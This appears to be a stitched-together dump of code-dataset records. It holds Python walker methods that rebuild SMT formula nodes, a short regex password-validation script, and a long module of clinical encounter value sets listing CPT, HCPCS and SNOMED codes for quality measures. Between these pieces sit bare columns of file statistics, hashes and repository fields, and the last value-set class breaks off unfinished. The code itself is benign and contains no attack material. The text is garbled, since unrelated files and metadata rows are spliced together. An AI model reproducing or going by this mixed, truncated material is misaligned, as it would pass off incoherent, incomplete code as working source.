def walk_bv_rol(self, formula, args, **kwargs):
    return self.mgr.BVRol(args[0], formula.bv_rotation_step())

def walk_bv_sext(self, formula, args, **kwargs):
    # Extension width is stored on the node, not as a child.
    return self.mgr.BVSExt(args[0], formula.bv_extend_step())

def walk_bv_zext(self, formula, args, **kwargs):
    return self.mgr.BVZExt(args[0], formula.bv_extend_step())

def walk_bv_concat(self, formula, args, **kwargs):
    return self.mgr.BVConcat(args[0], args[1])

def walk_bv_lshl(self, formula, args, **kwargs):
    return self.mgr.BVLShl(args[0], args[1])

def walk_bv_lshr(self, formula, args, **kwargs):
    return self.mgr.BVLShr(args[0], args[1])

def walk_bv_ashr(self, formula, args, **kwargs):
    return self.mgr.BVAShr(args[0], args[1])

def walk_bv_comp(self, formula, args, **kwargs):
    return self.mgr.BVComp(args[0], args[1])

def walk_bv_slt(self, formula, args, **kwargs):
    return self.mgr.BVSLT(args[0], args[1])

def walk_bv_sle(self, formula, args, **kwargs):
    return self.mgr.BVSLE(args[0], args[1])

def walk_bv_sdiv(self, formula, args, **kwargs):
    return self.mgr.BVSDiv(args[0], args[1])

def walk_bv_srem(self, formula, args, **kwargs):
    return self.mgr.BVSRem(args[0], args[1])
# --- String walkers ------------------------------------------------------
# Identity-reconstruction walkers for string-theory nodes.

def walk_str_length(self, formula, args, **kwargs):
    return self.mgr.StrLength(args[0])

def walk_str_concat(self, formula, args, **kwargs):
    # StrConcat is n-ary: forward the whole child list, not positionals.
    return self.mgr.StrConcat(args)

def walk_str_contains(self, formula, args, **kwargs):
    return self.mgr.StrContains(args[0], args[1])

def walk_str_indexof(self, formula, args, **kwargs):
    # (string, substring, start-offset)
    return self.mgr.StrIndexOf(args[0], args[1], args[2])

def walk_str_replace(self, formula, args, **kwargs):
    return self.mgr.StrReplace(args[0], args[1], args[2])

def walk_str_substr(self, formula, args, **kwargs):
    return self.mgr.StrSubstr(args[0], args[1], args[2])

def walk_str_prefixof(self, formula, args, **kwargs):
    return self.mgr.StrPrefixOf(args[0], args[1])

def walk_str_suffixof(self, formula, args, **kwargs):
    return self.mgr.StrSuffixOf(args[0], args[1])

def walk_str_to_int(self, formula, args, **kwargs):
    return self.mgr.StrToInt(args[0])

def walk_int_to_str(self, formula, args, **kwargs):
    return self.mgr.IntToStr(args[0])

def walk_str_charat(self, formula, args, **kwargs):
    return self.mgr.StrCharAt(args[0], args[1])
def walk_bv_tonatural(self, formula, args, **kwargs):
    return self.mgr.BVToNatural(args[0])

def walk_array_select(self, formula, args, **kwargs):
    return self.mgr.Select(args[0], args[1])

def walk_array_store(self, formula, args, **kwargs):
    # (array, index, value)
    return self.mgr.Store(args[0], args[1], args[2])

def walk_array_value(self, formula, args, **kwargs):
    # args is laid out as [default, idx1, val1, idx2, val2, ...]; pair up
    # the interleaved index/value children into an explicit assignment map.
    assign = dict(zip(args[1::2], args[2::2]))
    return self.mgr.Array(formula.array_value_index_type(),
                          args[0],
                          assign)

def walk_div(self, formula, args, **kwargs):
    return self.mgr.Div(args[0], args[1])
| 35.302239
| 82
| 0.640524
| 1,357
| 9,461
| 4.335298
| 0.173176
| 0.08686
| 0.159103
| 0.246303
| 0.63454
| 0.596634
| 0.573517
| 0.221486
| 0.066803
| 0.030937
| 0
| 0.015989
| 0.219956
| 9,461
| 267
| 83
| 35.434457
| 0.781165
| 0.091428
| 0
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.445122
| false
| 0
| 0.006098
| 0.414634
| 0.896341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
1c5fc3224b4e30fdb69bfccacfab4abbecd78298
| 168
|
py
|
Python
|
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
import re

# Read the candidate password and accept it only when it is made of
# 6 to 15 "word" characters (ASCII letters, digits, underscore).
password = input()
pattern = r'^[\w]{6,15}$'
if re.match(pattern, password, flags=re.ASCII):
    print("Thank you!")
else:
    print("Error!")
| 21
| 51
| 0.672619
| 27
| 168
| 4.185185
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 0.142857
| 168
| 7
| 52
| 24
| 0.763889
| 0.083333
| 0
| 0
| 0
| 0
| 0.184211
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| false
| 0.4
| 0.2
| 0
| 0.2
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
1c67f4ce1c24e807f5f277ab2d49968e23adb702
| 36,666
|
py
|
Python
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 12
|
2022-02-25T18:15:43.000Z
|
2022-03-30T18:43:02.000Z
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
ReyBernDia/open-source-sdk
|
d6570a6096658e5da70262bb4fbcedae12ca8523
|
[
"Apache-2.0"
] | 1
|
2022-03-18T22:21:03.000Z
|
2022-03-18T22:22:36.000Z
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
ReyBernDia/open-source-sdk
|
d6570a6096658e5da70262bb4fbcedae12ca8523
|
[
"Apache-2.0"
] | 4
|
2022-02-25T18:15:33.000Z
|
2022-02-25T19:14:17.000Z
|
from ..value_set import ValueSet
class AcuteInpatient(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts related to acute inpatient visits.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an acute inpatient setting. This is a grouping value set of CPT and SNOMED codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1083'
    VALUE_SET_NAME = 'Acute Inpatient'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99221', '99222', '99223', '99231', '99232', '99233', '99238',
        '99239', '99251', '99252', '99253', '99254', '99255', '99291',
    }

    SNOMEDCT = {
        '112689000', '1505002', '15584006', '183450002', '183481006',
        '183487005', '183488000', '183489008', '183491000', '183492007',
        '183493002', '183494008', '183495009', '183496005', '183497001',
        '183498006', '183499003', '183500007', '183501006', '183502004',
        '183503009', '183504003', '183505002', '183506001', '183507005',
        '183508000', '183509008', '183510003', '183511004', '183512006',
        '235313004', '25986004', '287927002', '304566005', '305337004',
        '305338009', '305341000', '305342007', '305350003', '305354007',
        '305355008', '305356009', '305357000', '305358005', '305359002',
        '305360007', '305361006', '305362004', '305363009', '305364003',
        '305365002', '305366001', '305367005', '305368000', '305369008',
        '305370009', '305371008', '305372001', '305374000', '305375004',
        '305376003', '305377007', '305378002', '305379005', '305380008',
        '305382000', '305383005', '305384004', '305385003', '305386002',
        '305387006', '305388001', '305389009', '305390000', '305391001',
        '305392008', '305393003', '305394009', '305395005', '305396006',
        '305397002', '305399004', '305400006', '305401005', '305402003',
        '305403008', '305404002', '305405001', '305406000', '305407009',
        '305408004', '305409007', '305410002', '305411003', '305412005',
        '305413000', '305414006', '305415007', '305416008', '305417004',
        '305418009', '305419001', '305420007', '305421006', '305422004',
        '305423009', '305424003', '305425002', '305426001', '305427005',
        '305428000', '305429008', '305430003', '305431004', '305432006',
        '305433001', '305434007', '305435008', '306732000', '306803007',
        '306967009', '308251003', '308252005', '308253000', '310361003',
        '3241000175106', '32485007', '373113001', '397769005', '398162007',
        '405614004', '417005', '432621000124105', '442281000124108',
        '447941000124106', '448421000124105', '448431000124108',
        '448441000124103', '448851000124103', '4563007', '45702004',
        '47348005', '48183000', '51032003', '51501005', '5161006',
        '52748007', '60059000', '63551005', '699124006', '70755000',
        '71290004', '76193006', '76464004', '81672003', '82942009',
        '8715000',
    }
class CareServicesInLongTermResidentialFacility(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients living in assisted living, domiciliary care or rest homes who have had an interaction with a member of their medical team.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with services provided to new and established patients living in assisted living, domiciliary care or rest home. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** Excludes visits in settings other than assisted living, domiciliary care or rest homes.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1014'
    VALUE_SET_NAME = 'Care Services in Long-Term Residential Facility'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99324', '99325', '99326', '99327', '99328',
        '99334', '99335', '99336', '99337',
    }

    SNOMEDCT = {'209099002', '210098006'}
class ClinicalOralEvaluation(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who had a clinical oral evaluation.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with periodic, limited (problem focused

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.125.12.1003'
    VALUE_SET_NAME = 'Clinical Oral Evaluation'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CDT = {
        'D0120', 'D0140', 'D0145', 'D0150', 'D0160', 'D0170', 'D0180',
    }
class ContactOrOfficeVisit(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent contact and office visits for new and established patients, and includes in-person, telephone, online, and other visit types related to depression encounters.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with outpatient contact and office visits in which a patient may be evaluated for depression. This groups CPT and HCPCS codes.

    **Exclusion Criteria:** Excludes inpatients for purposes of the index event. The majority of CPT codes are specified for outpatient visit types; however psychiatry and psychotherapy visits can be used in the inpatient setting.
    """

    OID = '2.16.840.1.113762.1.4.1080.5'
    VALUE_SET_NAME = 'Contact or Office Visit'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '90791', '90792', '90832', '90834', '90837',
        '99201', '99202', '99203', '99204', '99205',
        '99211', '99212', '99213', '99214', '99215',
        '99421', '99422', '99423',
        '99441', '99442', '99443', '99444',
    }

    HCPCSLEVELII = {
        'G0402', 'G0438', 'G0439', 'G2061', 'G2062', 'G2063',
    }
class DetoxificationVisit(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent detoxification visits.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with identifying alcohol and drug detoxification. This is a grouping of SNOMED CT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1059'
    VALUE_SET_NAME = 'Detoxification Visit'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    SNOMEDCT = {
        '182969009', '20093000', '23915005', '414054004', '414056002',
        '56876005', '61480009', '64297001', '67516001', '87106005',
    }
class DischargeServicesHospitalInpatient(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent inpatient hospital discharge services.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with identifying hospital discharge day management. This is a grouping of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1007'
    VALUE_SET_NAME = 'Discharge Services - Hospital Inpatient'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99238', '99239'}
class DischargeServicesHospitalInpatientSameDayDischarge(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent inpatient hospital same day discharge services.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with identifying observation or inpatient care for the evaluation and management of a patient that results in discharge on the same date of admission. This is a grouping of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1006'
    VALUE_SET_NAME = 'Discharge Services - Hospital Inpatient Same Day Discharge'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99234', '99235', '99236'}
class DischargeServicesNursingFacility(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have been discharged from a nursing facility.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with discharge from a nursing facility, including a final examination, instructions for continuing care and preparation of discharge records, prescriptions, and referral forms. Discharge services encounters can be less than or over 30 minutes. This is a grouping of CPT codes.

    **Exclusion Criteria:** Excludes discharges from settings other than a nursing facility.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1013'
    VALUE_SET_NAME = 'Discharge Services - Nursing Facility'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99315', '99316'}
class DischargeServicesNursingFacility_1065(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have been discharged from a nursing facility.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with discharge from a nursing facility, including a final examination, instructions for continuing care and preparation of discharge records, prescriptions, and referral forms. Discharge services encounters can be less than or over 30 minutes. This is a grouping of CPT codes.

    **Exclusion Criteria:** Excludes discharges from settings other than a nursing facility.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.11.1065'
    VALUE_SET_NAME = 'Discharge Services - Nursing Facility'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99315', '99316'}
class Ed(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts related to an ED visit.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an ED. This is a grouping value set of CPT and SNOMED codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1085'
    VALUE_SET_NAME = 'ED'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99281', '99282', '99283', '99284', '99285'}

    SNOMEDCT = {'4525004'}
class EmergencyDepartmentVisit(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have had an interaction with a member of their medical care team in the emergency department.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with care provided to new and established patients in the emergency department. This is a value set grouping that includes CPT and SNOMED CT codes.

    **Exclusion Criteria:** Excludes services not performed in the emergency department, including critical care and observation services.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1010'
    VALUE_SET_NAME = 'Emergency Department Visit'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99281', '99282', '99283', '99284', '99285'}

    SNOMEDCT = {'4525004'}
class FrailtyEncounter(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent nursing care services provided to frail patients.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with nursing care and home care services provided to frail patients. This is a grouping of CPT, HCPCS, and SNOMEDCT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1088'
    VALUE_SET_NAME = 'Frailty Encounter'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99504', '99509'}

    HCPCSLEVELII = {
        'G0162', 'G0299', 'G0300', 'G0493', 'G0494',
        'S0271', 'S0311', 'S9123', 'S9124',
        'T1000', 'T1001', 'T1002', 'T1003', 'T1004', 'T1005',
        'T1019', 'T1020', 'T1021', 'T1022', 'T1030', 'T1031',
    }

    SNOMEDCT = {'413467001'}
class HomeHealthcareServices(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have had a home health visit by a provider for the evaluation or management of a new or existing patient.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with home visits for the evaluation and management of a new or established patient. This is a grouping value set of CPT and SNOMED CT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1016'
    VALUE_SET_NAME = 'Home Healthcare Services'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99341', '99342', '99343', '99344', '99345',
        '99347', '99348', '99349', '99350',
    }

    SNOMEDCT = {
        '185460008', '185462000', '185466002', '185467006', '185468001',
        '185470005', '225929007', '315205008', '439708006', '698704008',
        '704126008',
    }
class HospitalInpatientVisitInitial(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent inpatient hospital visits.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with initial hospital care for the evaluation and management of a patient. This is a grouping of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1004'
    VALUE_SET_NAME = 'Hospital Inpatient Visit - Initial'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99221', '99222', '99223'}
class HospitalObservationCareInitial(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent initial inpatient hospital observation care.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with initial observation care for the evaluation and management of a patient. This is a grouping of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1002'
    VALUE_SET_NAME = 'Hospital Observation Care - Initial'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99218', '99219', '99220'}
class MedicalDisabilityExam(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent work related or medical disability examinations.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with work related or medical disability examinations. This is a grouping of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.11.1233'
    VALUE_SET_NAME = 'Medical Disability Exam'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99455', '99456'}
class NonacuteInpatient(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts related to nonacute inpatient visits.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in a nonacute inpatient setting. This is a grouping value set of CPT and SNOMED codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1084'
    VALUE_SET_NAME = 'Nonacute Inpatient'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99304', '99305', '99306', '99307', '99308', '99309', '99310',
        '99315', '99316', '99318',
        '99324', '99325', '99326', '99327', '99328',
        '99334', '99335', '99336', '99337',
    }

    SNOMEDCT = {
        '112690009', '183430001', '183921001', '304567001', '304568006',
        '305336008', '305340004', '305381007', '306804001', '36723004',
        '449411000124106', '449421000124103', '449431000124100',
    }
class NursingFacilityVisit(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have had an interaction with a member of their medical team on admission to a nursing facility.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with services provided to new and established patients in a nursing facility (skilled, intermediate and long-term care facilities).

    **Exclusion Criteria:** Excludes visits in settings other than a nursing facility.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1012'
    VALUE_SET_NAME = 'Nursing Facility Visit'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99304', '99305', '99306', '99307', '99308', '99309', '99310',
        '99315', '99316', '99318',
    }

    SNOMEDCT = {'18170008', '207195004'}
class Observation(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts related to observation visits.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an observation care setting. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1086'
    VALUE_SET_NAME = 'Observation'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99217', '99218', '99219', '99220'}
class OfficeVisit(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have had an office or other outpatient visit.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an office or outpatient facility. Patient can be presenting with problems that are minor to high severity. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** Excludes non-office visits, including telehealth services.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1001'
    VALUE_SET_NAME = 'Office Visit'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99201', '99202', '99203', '99204', '99205',
        '99212', '99213', '99214', '99215',
    }

    SNOMEDCT = {
        '185463005', '185464004', '185465003', '30346009',
        '3391000175108', '37894004', '439740005',
    }
class Outpatient(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts related to outpatient visits.

    **Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an outpatient setting. This is a grouping value set of CPT and HCPCS codes.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1087'
    VALUE_SET_NAME = 'Outpatient'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {
        '99201', '99202', '99203', '99204', '99205',
        '99211', '99212', '99213', '99214', '99215',
        '99241', '99242', '99243', '99244', '99245',
        '99341', '99342', '99343', '99344', '99345',
        '99347', '99348', '99349', '99350',
        '99381', '99382', '99383', '99384', '99385', '99386', '99387',
        '99391', '99392', '99393', '99394', '99395', '99396', '99397',
        '99401', '99402', '99403', '99404',
        '99411', '99412', '99429', '99455', '99456', '99483',
    }

    HCPCSLEVELII = {
        'G0402', 'G0438', 'G0439', 'G0463', 'T1015',
    }
class OutpatientConsultation(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have had an outpatient interaction at an office with a member of their medical care team.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an office or outpatient facility. Patient can be presenting with problems that are minor to high severity. This is a grouping value set of CPT and SNOMED CT codes.

    **Exclusion Criteria:** Excludes non-office visits, including telehealth services.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1008'
    VALUE_SET_NAME = 'Outpatient Consultation'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99241', '99242', '99243', '99244', '99245'}

    SNOMEDCT = {'281036007', '77406008'}
class PreventiveCareEstablishedOfficeVisit0To17(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, to be associated with patients 0-17 years of age, that received prior outpatient professional services from the physician practice in the last 3 years.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with ages 0-17, and indicating initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, for a patient that received prior outpatient professional services from the physician practice in the last 3 years. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** Excludes codes that are not for comprehensive preventive medical evaluations and codes that are for patients who have not been seen in the last 3 years.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1024'
    VALUE_SET_NAME = 'Preventive Care, Established Office Visit, 0 to 17'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99391', '99392', '99393', '99394'}
class PreventiveCareServicesEstablishedOfficeVisit18AndUp(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients over the age of 18 who have had an established preventive care office visit.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with comprehensive preventive medicine reevaluation and management of an individual the age of 18 years or over. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** Excludes non-office visits, including telehealth services.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1025'
    VALUE_SET_NAME = 'Preventive Care Services - Established Office Visit, 18 and Up'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99395', '99396', '99397'}
class PreventiveCareServicesGroupCounseling(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent group counseling services.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with identifying preventive medicine counseling and/or risk factor reduction intervention(s) provided to individuals in a group setting.

    **Exclusion Criteria:** No exclusions.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1027'
    VALUE_SET_NAME = 'Preventive Care Services - Group Counseling'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99411', '99412'}
class PreventiveCareServicesIndividualCounseling(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent patients who have received preventive medicine counseling and/or risk factor reduction interventions.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with counseling, anticipatory guidance, and risk factor reduction interventions. Preventative care and individual counseling encounters can be 15 to 60 minutes. This is a grouping of CPT codes.

    **Exclusion Criteria:** Excludes codes for services performed in the emergency department, including critical care and observation services.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1026'
    VALUE_SET_NAME = 'Preventive Care Services-Individual Counseling'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99401', '99402', '99403', '99404'}
class PreventiveCareServicesInitialOfficeVisit0To17(ValueSet):
    """
    **Clinical Focus:** This value set contains concepts that represent initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, to be associated with patients 0-17 years of age, that have no prior outpatient professional services from the physician practice in the last 3 years.

    **Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.

    **Inclusion Criteria:** Includes only relevant concepts associated with ages 0-17, and that indicate initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, for a patient that has no prior outpatient professional services from the physician practice in the last 3 years. This is a grouping value set of CPT codes.

    **Exclusion Criteria:** Excludes codes that are not for comprehensive preventive medical evaluations and codes that are for patients who have been seen in the last 3 years.
    """

    OID = '2.16.840.1.113883.3.464.1003.101.12.1022'
    VALUE_SET_NAME = 'Preventive Care Services, Initial Office Visit, 0 to 17'
    EXPANSION_VERSION = 'eCQM Update 2020-05-07'

    CPT = {'99381', '99382', '99383', '99384'}
class PreventiveCareServicesInitialOfficeVisit18AndUp(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients over the age of 18 who have had an initial preventive care office visit.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive preventive medicine reevaluation and management of an individual the age of 18 years or over. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes non-office visits, including telehealth services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1023'
VALUE_SET_NAME = 'Preventive Care Services-Initial Office Visit, 18 and Up'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99385',
'99386',
'99387'
}
class PreventiveCareServicesOther(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent unlisted preventive medicine services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with unlisted preventive medicine services. This is a grouping of a CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1030'
VALUE_SET_NAME = 'Preventive Care Services - Other'
